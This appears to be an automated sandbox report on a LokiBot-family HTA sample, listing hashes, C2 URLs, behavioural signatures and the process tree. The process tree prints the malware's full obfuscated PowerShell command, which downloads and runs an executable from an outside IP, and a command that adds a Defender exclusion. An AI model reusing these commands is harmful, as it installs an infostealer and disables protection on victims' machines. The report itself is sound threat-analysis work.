Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 01:33
Static task
static1
Behavioral task
behavioral1
Sample
dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21.hta
Resource
win10v2004-20241007-en
General
-
Target
dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21.hta
-
Size
178KB
-
MD5
a54bdd270a424ec79b735ef6b513c2e4
-
SHA1
465738a3e31b16ad80c44f3dc7bdd762e402cb51
-
SHA256
dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21
-
SHA512
598f303f9f570851f3e538dcd5d9e23717e177b3e652320a7d58dc4800a0f81d9445b719e51b0875b640460c1b4d6be7a592e738b1004c2c0490bffac8ba0c61
-
SSDEEP
96:4vCl1722AAZtbZfjdDINnmScJXD65zbfKZ/UQ:4vCld22AAVjBIcyzbfyUQ
Malware Config
Extracted
lokibot
http://94.156.177.41/maxzi/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 1 IoCs
Processes:
pOWERSHELl.exEflow pid process 3 2800 pOWERSHELl.exE -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
Processes:
pOWERSHELl.exEpowershell.exepid process 2800 pOWERSHELl.exE 2708 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
caspol.execaspol.exepid process 2356 caspol.exe 2036 caspol.exe -
Loads dropped DLL 3 IoCs
Processes:
pOWERSHELl.exEpid process 2800 pOWERSHELl.exE 2800 pOWERSHELl.exE 2800 pOWERSHELl.exE -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
caspol.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
caspol.exedescription pid process target process PID 2356 set thread context of 2036 2356 caspol.exe caspol.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
mshta.exepOWERSHELl.exEpowershell.execsc.execvtres.execaspol.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOWERSHELl.exE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language caspol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
pOWERSHELl.exEpowershell.exepowershell.exepid process 2800 pOWERSHELl.exE 2708 powershell.exe 1352 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
pOWERSHELl.exEpowershell.exepowershell.execaspol.exedescription pid process Token: SeDebugPrivilege 2800 pOWERSHELl.exE Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 1352 powershell.exe Token: SeDebugPrivilege 2036 caspol.exe -
Suspicious use of WriteProcessMemory 34 IoCs
Processes:
mshta.exepOWERSHELl.exEcsc.execaspol.exedescription pid process target process PID 2644 wrote to memory of 2800 2644 mshta.exe pOWERSHELl.exE PID 2644 wrote to memory of 2800 2644 mshta.exe pOWERSHELl.exE PID 2644 wrote to memory of 2800 2644 mshta.exe pOWERSHELl.exE PID 2644 wrote to memory of 2800 2644 mshta.exe pOWERSHELl.exE PID 2800 wrote to memory of 2708 2800 pOWERSHELl.exE powershell.exe PID 2800 wrote to memory of 2708 2800 pOWERSHELl.exE powershell.exe PID 2800 wrote to memory of 2708 2800 pOWERSHELl.exE powershell.exe PID 2800 wrote to memory of 2708 2800 pOWERSHELl.exE powershell.exe PID 2800 wrote to memory of 2924 2800 pOWERSHELl.exE csc.exe PID 2800 wrote to memory of 2924 2800 pOWERSHELl.exE csc.exe PID 2800 wrote to memory of 2924 2800 pOWERSHELl.exE csc.exe PID 2800 wrote to memory of 2924 2800 pOWERSHELl.exE csc.exe PID 2924 wrote to memory of 2328 2924 csc.exe cvtres.exe PID 2924 wrote to memory of 2328 2924 csc.exe cvtres.exe PID 2924 wrote to memory of 2328 2924 csc.exe cvtres.exe PID 2924 wrote to memory of 2328 2924 csc.exe cvtres.exe PID 2800 wrote to memory of 2356 2800 pOWERSHELl.exE caspol.exe PID 2800 wrote to memory of 2356 2800 pOWERSHELl.exE caspol.exe PID 2800 wrote to memory of 2356 2800 pOWERSHELl.exE caspol.exe PID 2800 wrote to memory of 2356 2800 pOWERSHELl.exE caspol.exe PID 2356 wrote to memory of 1352 2356 caspol.exe powershell.exe PID 2356 wrote to memory of 1352 2356 caspol.exe powershell.exe PID 2356 wrote to memory of 1352 2356 caspol.exe powershell.exe PID 2356 wrote to memory of 1352 2356 caspol.exe powershell.exe PID 2356 wrote to memory of 2036 2356 caspol.exe caspol.exe PID 2356 wrote to memory of 2036 2356 caspol.exe caspol.exe PID 2356 wrote to memory of 2036 2356 caspol.exe caspol.exe PID 2356 wrote to memory of 2036 2356 caspol.exe caspol.exe PID 2356 wrote to memory of 2036 2356 caspol.exe caspol.exe PID 2356 wrote to memory of 2036 2356 caspol.exe caspol.exe PID 2356 wrote to memory of 2036 2356 caspol.exe caspol.exe PID 2356 wrote to memory of 2036 2356 caspol.exe caspol.exe PID 2356 wrote to memory of 2036 2356 caspol.exe caspol.exe PID 2356 wrote to memory of 2036 2356 caspol.exe caspol.exe -
outlook_office_path 1 IoCs
Processes:
caspol.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
outlook_win_path 1 IoCs
Processes:
caspol.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE"C:\Windows\SysTEM32\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE" "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'JEFIQ2MxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlUkRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3piR3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZEdvU2hpRWwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZZTGlNem4sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYkcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNQmdOa1F0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLWHhFWHhxZEVFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSENjMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzY2LjYzLjE4Ny4yMzEvNjU3L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtTVGFSVC1zbGVFcCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGNhc3BvbC5leGUi'+[ChAR]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t56ygmdu.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES197.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC196.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2328
-
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2036
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a8c57741d9c78675e29ddf1d608123da
SHA1936398d80464491ab13f72fc0c182cc8afe302d0
SHA25687be9d4e22876b6c91640fd8c2870aba0827680d6a0c4c4d62c259521908606f
SHA5128bf34cb537e2672b453102f54a206646eb0f37bfb4e2f04e4a4da919dd62143c08be5c6e524ef4abcd6541760dd2fdc9eb8bc0d0e01c339066e3907dccc575b4
-
Filesize
3KB
MD5275b043b4b8befa05447b8ab3fb5bb61
SHA182566d076df5b3b10eeb6957d0c32a408ec588fb
SHA256fff7bba83f1ef5bde213b2d1534e8f19bfa33670f23810235dc579b11f3d0fd0
SHA51271d2b22e73747dab091cc1806abdf7ac3204dca18ed5a7f34280979b5493903c47048579cb3999a9ffaa3dc413af86b991700443a472b7aa265b193cd1312bcc
-
Filesize
7KB
MD521e67463c3ecdd59e4914867d165d7ac
SHA1970a9fabbb73d4bc22292ccaad1cc8e57840801e
SHA256e58ae9fb21e05e7f19e89a166a2387487cdcab1b36095d68bc7805205192caf4
SHA51287a37cea217ea96057eb4d1f70a2410c8a1a90a2deb36472b71198836e75d64d5f0a0f84acb5516c565e4041ad8b8fa207c4104ac2348e2d670ebba0a3f37fe6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3290804112-2823094203-3137964600-1000\0f5007522459c86e95ffcc62f32308f1_94ea1d76-6d7e-4d9e-abc7-ef9a6a2a9269
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3290804112-2823094203-3137964600-1000\0f5007522459c86e95ffcc62f32308f1_94ea1d76-6d7e-4d9e-abc7-ef9a6a2a9269
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5bdaf58850f8ecdd15a847c4e9cfe0095
SHA127e65e12f99b7a354ee6b9372ade51f0209cfcca
SHA25666e89c9d0499a96248153acd17d39ee95193a2cab584ca8c95393945114cc789
SHA512c7cc3ede89c2e147795782a0289f2f0b1c40755a626fc78ffd83298abc6d3d83eeb9226e7a938d7eea8bd9bec7557447a8b805866b52be0f256c59fdbdad65af
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
652B
MD5985b5af135b9729c061a889cc22f3c65
SHA14df7251a3675bd252259367d2f631fde70d1c4a6
SHA25642c71fb511e97eb55a303cf1f8b62faf74170f22273055a080086ff38d0bbe22
SHA512589023d7a85cefd8f95419bd6eee143160740889f59460d92fff7b7cd8267c40fb9ed4df77e755724733a85d64380424b829dbef27ade4622acc7706b0c25c46
-
Filesize
477B
MD5f97fc8141f59078b4354b513d3b083ac
SHA1293904ab8d5f38a2f0764ee2e35e97e590d8c737
SHA256f6766cc467b91c9c99186a91d4cc32ebf6803b04c9e82ba8dedd54f9dc25b32e
SHA51287b65e67e76c334c79481d25513fb1696ab86b1d8bf6006b7436a5ba7e522e2101912315c16d92cb0bf0feb86aa9616d5ea1019054c489958ca364947abe879c
-
Filesize
309B
MD5dd0b112c6ab7891dcdeecc5ac1f0f9f3
SHA173aad2b38d50060141cf102ec358d2294d027d7c
SHA25626e88596bdf6ab45433746c895b48e5c78d01c95bedfb81969a7893ceb1a352e
SHA512d425117bc4c22e9472c1df705574b112b39c7488120ffdbbed1aebcc4083e8ee6ce2a2f381be0dc6fde5158f1963ebda84547effd900d640a3938250728d26b8
-
Filesize
506KB
MD5759dd13715bc424308f1d0032ac4b502
SHA103347c96c50c140192e8df70260d732bea301ebc
SHA256d4c86776bcf1dc4ffd2f51538f3e342216314b76cdba2c2864193350654a9aca
SHA5124197992f4b44ea45c91cb00c7308949560ae24d179e9a14ebc4efb27e1b20abae203b1c8756c211eb9aab9732a3fd04c824bd6bc92510c8de3caea3a8cfa8e55